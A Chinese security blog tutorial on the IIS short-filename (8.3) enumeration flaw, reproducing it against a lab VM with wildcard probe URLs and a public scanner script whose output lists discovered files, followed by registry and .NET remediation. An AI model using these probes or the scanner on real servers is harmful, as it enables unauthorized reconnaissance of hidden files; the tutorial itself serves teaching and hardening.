IIS - 短文件名猜解漏洞
网络安全/渗透测试/代码审计/
关注
IIS - 短文件名猜解漏洞
短文件名介绍
为了兼容16
位MS-DOS
程序,Windows为文件名较长的文件(和文件夹)生成了对应的Windows 8.3
短文件名。
短文件名的查看
首先在C盘下多创建几个文件:(有不同的后缀名,都是比较长的文件名)
aaaaaaaaaaaa.txt
bbbbbbbbbbbb.asp
abcdefghijk.txt
abcdefghig.php
打开命令提示符
,来到C盘
下,查看短文件名的命名方式:dir /x
C:>dir /x
驱动器 C 中的卷没有标签。
卷的序列号是 509E-D608
C: 的目录
2019-08-02 12:37 0 AAAAAA~1.TXT aaaaaaaaaaaaa.txt
2019-08-02 12:47 0 abc.txt
2019-08-02 12:39 0 ABCDEF~1.PHP abcdefghig.php
2019-08-02 12:39 0 ABCDEF~1.TXT abcdefghijk.txt
2019-07-23 11:47 0 AUTOEXEC.BAT
2019-08-02 12:37 0 BBBBBB~1.ASP bbbbbbbbbbbbbb.aspx
2019-07-23 11:47 0 CONFIG.SYS
2019-07-23 11:49 <DIR> DOCUME~1 Documents and Settings
2019-07-23 11:59 <DIR> FPSE_S~1 FPSE_search
2019-07-23 11:59 <DIR> Inetpub
2019-07-23 11:51 <DIR> PROGRA~1 Program Files
2019-07-23 13:17 <DIR> WINDOWS
2019-07-23 11:47 <DIR> wmpub
7 个文件 0 字节
6 个目录 28,107,870,208 可用字节
C:>
可以看到我们第一个文件:aaaaaaaaaaaaa.txt
这个文件,他显示的短文件名形式是大写的AAAAAA~1.TXT
abcdefghig.php
这个文件,他显示的短文件名形式也是大写的ABCDEF~1.PHP
后面的也一样,只保留前六位数
的文件名
+ ~
+ 1.后缀名
这时候,我们再创建一个文件:abc.txt
,然后在用dir /x
查看一下:
可以看到,前面并没有短文件名,因为它本身长度就不是特别的长!
从以上实验得出短文件名的特征:
短文件名特征
1、只有前六位
字符直接显示,后续字符用~1
指代。其中数字1
还可以递增,如果存在多个文件名类似的文件(名称前6位必须相同,且后缀名前3位必须相同)
2、后缀名最长只有3
位,多余的被截断,超过3位的长文件会生成短文件名
3、所有小写字母
都会转换成大写字母
4、长文件名中含有多个.
,以文件名最后一个.
作为短文件名后缀
5、长文件名前缀/文件夹名字符长度符合0-9
和Aa-Zz
范围且需要大于等于9位
才会生成短文件名,如果包含空格或者其他部分特殊字符,不论长度均会生成短文件。
漏洞成因
攻击者使用通配符*
和?
发生一个请求到IIS
,当IIS接收到一个文件路径中包含~
请求时,它的反应是不同的,即返回的HTTP状态码
和错误信息不同。基于这个特点,可以根据HTTP的响应区分一个可用或者不可用的文件。访问构造的某个存在
的短文件名,会返回404
;访问构造的某个不存在
的短文件名,会返回400
(报错页面)
IIS短文件猜解漏洞复现(手工测试)
因为我开着IIS
的虚拟机的IP是192.168.119.133
,所以我直接访问这个URL:
http://192.168.119.133/a*~1*/.aspx
/a*~1*/
的意思就是,用首字母a
这个字符去匹配,也就是首字母a
是否存在
这个短文件名。~1
这个和上面的短文件名特征是一样的,代表了它是一个短文件名。
如果说这个页面返回的状态码是404
的话,那么这个短文件名是存在
的!如果返回的是400
,泽说明这个短文件名是不存在
的!
从上图可以得出,返回的页面状态码是404
,说明网站更目录下有一个文件是以a
开头的短文件名。
aspnet_client
这个文件夹是iis
自带的文件夹目录,所以会显示存在!
这个时候我们测试一个不存在的文件或者文件名:
访问URL:
http://192.168.119.133/c*~1*/.aspx
返回的状态码是400
,说明不存在
以c
开头的短文件名。
IIS短文件名猜解漏洞复现(工具测试)
用到的工具来自Github
上的IIS短文件名猜解工具:IIS_shortname_Scanner
用法是:iis_shortname_Scan.py 目标主机
python iis_shortname_Scan.py http://192.168.119.133
用之前,我们先把刚刚创建的那些文件复制到我们的网站更目录,然后再使用:
E:HACKIIS短文件名猜解工具IIS_shortname_Scanner>python iis_shortname_Scan.py h
ttp://192.168.119.133
Server is vulnerable, please wait, scanning...
[+] /a~1.* [scan in progress]
[+] /b~1.* [scan in progress]
[+] /ab~1.* [scan in progress]
[+] /aa~1.* [scan in progress]
[+] /bb~1.* [scan in progress]
[+] /as~1.* [scan in progress]
[+] /abc~1.* [scan in progress]
[+] /aaa~1.* [scan in progress]
[+] /bbb~1.* [scan in progress]
[+] /asp~1.* [scan in progress]
[+] /abcd~1.* [scan in progress]
[+] /aaaa~1.* [scan in progress]
[+] /bbbb~1.* [scan in progress]
[+] /aspn~1.* [scan in progress]
[+] /abcde~1.* [scan in progress]
[+] /aaaaa~1.* [scan in progress]
[+] /bbbbb~1.* [scan in progress]
[+] /aspne~1.* [scan in progress]
[+] /abcdef~1.* [scan in progress]
[+] /aaaaaa~1.* [scan in progress]
[+] /bbbbbb~1.* [scan in progress]
[+] /aspnet~1.* [scan in progress]
[+] /abcdef~1.p* [scan in progress]
[+] /abcdef~1.t* [scan in progress]
[+] /aaaaaa~1.t* [scan in progress]
[+] /bbbbbb~1.a* [scan in progress]
[+] /aspnet~1 [scan in progress]
[+] Directory /aspnet~1 [Done]
[+] /abcdef~1.ph* [scan in progress]
[+] /abcdef~1.tx* [scan in progress]
[+] /aaaaaa~1.tx* [scan in progress]
[+] /bbbbbb~1.as* [scan in progress]
[+] /abcdef~1.php* [scan in progress]
[+] File /abcdef~1.php* [Done]
[+] /abcdef~1.txt* [scan in progress]
[+] File /abcdef~1.txt* [Done]
[+] /aaaaaa~1.txt* [scan in progress]
[+] File /aaaaaa~1.txt* [Done]
[+] /bbbbbb~1.asp* [scan in progress]
[+] File /bbbbbb~1.asp* [Done]
----------------------------------------------------------------
Dir: /aspnet~1
File: /abcdef~1.php*
File: /abcdef~1.txt*
File: /aaaaaa~1.txt*
File: /bbbbbb~1.asp*
----------------------------------------------------------------
1 Directories, 4 Files found in total
Note that * is a wildcard, matches any character zero or more times.
可以从上图中对照一下看看,成功猜解出我们网站更目录下的短文件名!
漏洞修复
1、升级.net framework
2、修改注册表键值:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlFileSystem
修改NtfsDisable8dot3NameCreation
为1
,1
代表不创建短文件名格式,修改完成后,需要重启系统生效。
- CCKiller:Linux轻量级CC攻击防御工具,秒级检查、自动拉黑和释放
- 利用HSTS安全协议柔性解决全站HTTPS的兼容性问题
- Nginx内容替换模块http_substitutions_filter_module及实用案例分享
- libmemcached编译安装报错解决记录
- 解决网站静态缓存后WP-PostViews插件不计数的问题
- Haproxy安装部署文档及多配置文件管理方案
- ASM 翻译系列第三十四弹:ASM磁盘组重要属性介绍
- 博客集成Hitokoto·一言经典语句功能
- 博客网页导致电脑CPU飙升的问题解决记录
- 恢复WordPress分类目录的别名链接形式
- 替代crontab,统一定时任务管理系统cronsun简介
- 小网站最简单实用的动静分离优化方案
- Haproxy进阶管理:命令行控制后端节点上下线
- 网站集成打字震动特效JS代码改进版
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Angular No provider for EffectsRootModule错误消息
- Leetcode No.15 三数之和
- 正则表达式介绍与使用
- Angular StoreFeatureModule
- Angular Component之间的事件通知机制
- 如何将你的Python项目全面自动化?
- 正则表达式介绍与使用
- Angular ERROR NullInjectorError: R3InjectorError(AppModule)的错误分析
- 2.4-Air302(NB-IOT)-基础外设-延时,定时器
- Shell正则表达式一览表
- YAML基础语法
- 详解Kubernetes存储体系
- Python3 正则表达式特殊符号及用法.md
- Web网页响应式布局.md
- BootStrap应用开发学习入门1